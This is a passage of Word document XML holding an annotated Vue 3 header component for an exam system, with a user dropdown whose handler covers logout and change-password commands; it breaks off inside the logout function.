    <w:p w14:paraId="05E7A829" w14:textId="68AD11E0" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>layouts/components</w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FHeader</w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C2B81" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRPr="004F1C6F" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107064D1" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D84E50" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div class="f-header"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F41293A" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;span class="logo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D791EE" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="mr-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460614AD" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;ElemeFilled /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72541A0C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78301A" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DA2518" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDE6C8" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B5110" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;Fold /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54019473" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA8DE1C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785DCC4F" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;Refresh /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4173E15E" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599B7EE" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div class="ml-auto flex items-center " style="margin-left: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531E4B3" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F8C8F" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;FullScreen /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23600226" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F281F" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-dropdown class="dropdown" @command="handleCommand"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E0FEE" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;span class="flex items-center text-light-50"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59961605" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-button type="el-dropdown-link" class=" bg-transparent text-light-200"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD7A19E" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-avatar class="mr-2" :size="25" :src="$store.state.user.avatar" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04602882" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        {{ $store.state.user.username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FEAB4F" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-icon class="el-icon--right"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFEFCB7" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;arrow-down /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743204F8" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF58E1D" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059B74B" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD97A08" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;template #dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2B712E" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A1B740" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>command="rePassword"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFFB4F0" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>command="logout"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD5F37" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA768E" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32FA8F" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC2F2AC" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E4AF90" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0730038E" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580502B3" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53457BFF" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB2BFDA" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { logout } from "~/api/manager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376DC59" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { showModal, toast } from '~/composables/util'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0071F" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { useRouter } from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DD9FF" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { useStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0EC25" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F603690" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const router = useRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4919F42D" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const store = useStore()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B92F3A" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7255857B" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const handleCommand = (c)=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EEAF7A" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    switch(c){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CEB576" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        case "logout":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514370C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            handleLogout()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0390B6A2" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB0E36" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        case "rePassword":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601D11A5" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            console.log("</w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563AD396" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D409DE" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B6476" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C99E266" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F5398" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386E7D4" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0978824A" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>function handleLogout() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B154A" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    showModal("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否要退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DCB1DD" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A06066" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // console.log("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9EFF38" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            logout()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B20333" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .then()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C319F1C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .catch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1B802" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AECFF77" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
